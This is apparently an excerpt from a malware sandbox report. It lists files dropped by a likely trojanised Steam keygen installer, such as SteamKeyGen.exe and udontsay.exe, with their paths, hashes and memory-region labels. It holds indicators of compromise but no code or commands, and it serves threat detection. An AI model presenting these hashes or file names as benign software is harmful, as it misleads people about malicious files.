MD5 fbe295e5a1acfbd0a6271898f885fe6a
SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA512 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

C:\Users\Admin\AppData\Local\Temp\nsg655B.tmp\System.dll

MD5 fbe295e5a1acfbd0a6271898f885fe6a
SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA512 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

memory/4288-303-0x0000000076C80000-0x0000000076E95000-memory.dmp

memory/1400-292-0x0000000000000000-mapping.dmp

memory/4288-291-0x0000000000C60000-0x0000000000D35000-memory.dmp

memory/2800-290-0x0000000000400000-0x00000000004CC000-memory.dmp

C:\Users\Public\SteamKeyNeg.exe

MD5 64eeb5ab677596ec8516a8414428b5d7
SHA1 4c8e61d0e2abfccb50c9a949d8bcb318b6c5e52a
SHA256 2ac567b583c3dc6843f8d7cba45b102b856f269395ee220801c7a490679a53b3
SHA512 16012d1985a45256d4978e0506a900ea9c8009530f0068e7870b3ec5b8ba2ebe0eb3542bc28a43eda3a7c1eb4dd2eeae672abb57a9799d51e1db3aa49598c439

C:\Users\Admin\AppData\Local\Temp\6AHD0.exe

MD5 5e2b57ba7e724923726235f4bab6dc3a
SHA1 717d816d000606d9778328d5400cb200d5a32aba
SHA256 ebccec79dade98b555e165fc883e7832fb86a1178e5c9ef807a947a9ce8141de
SHA512 79efb25d12371af32eda91f5896cca07fb917aa563e951aeb06f223b52ed5d018c31055cf55e73ad32ce821c7d54d8cb695fa5c63ee62b6225f0739d6166523b

C:\Users\Admin\AppData\Local\Temp\udontsay.exe

MD5 d330b06e5db0d2762afc840106a3c453
SHA1 02a94a31cb7fa526dbbcf0998bb5759b5abda55e
SHA256 adb97599b86196b2a2e47cbcd4eb605f11d809674678da2be9ff1f425c3f2653
SHA512 bd0f8193d133a4b71cf21e5e5b7688d5dd6795a42d9f795a036a79e47599f8d2c1836874001a27dac57946b5cabdffd402d5101a5197b28f810bdfc40cc62344

C:\Users\Admin\AppData\Local\Temp\nse6079.tmp\nsisdl.dll

MD5 ee68463fed225c5c98d800bdbd205598
SHA1 306364af624de3028e2078c4d8c234fa497bd723
SHA256 419485a096bc7d95f872ed1b9b7b5c537231183d710363beee4d235bb79dbe04
SHA512 b14fb74cb76b8f4e80fdd75b44adac3605883e2dcdb06b870811759d82fa2ec732cd63301f20a2168d7ad74510f62572818f90038f5116fe19c899eba68a5107

C:\Users\Public\SteamKeyGen.exe

MD5 c523d423234494eeb7b60a892d7a4bea
SHA1 db992908237ee2ab5c07f4362b9a29516ac09a5d
SHA256 98c0617a52694e05760b7f0584a3a0f15f772a4e8598cdd7bd833401e6c596d3
SHA512 0aa6808037697dfd7654a845008e9ee231b05e55a2aa5cb2984a060cc6100d4e7ced45483f832d37bde1adad99facf03b17e6a9268a26ed9b9ced1fa389a81ec

C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe

MD5 35fcec704d7072157fd5fdc35b543904
SHA1 34677f3d61028d45d87b952c9ec1f851729981a9
SHA256 9a49d97abc9f621287365999038cf919581abba2d89fcc1daf704bd34b298859
SHA512 863500aa8acc3f35ad346b7d2a8037d2b5a40810baee99f0ab7333f6fbdad4234d789a0d857cf884490a2c0b3b87c70318a09b85f762f0b5340f7b2bfaa09197
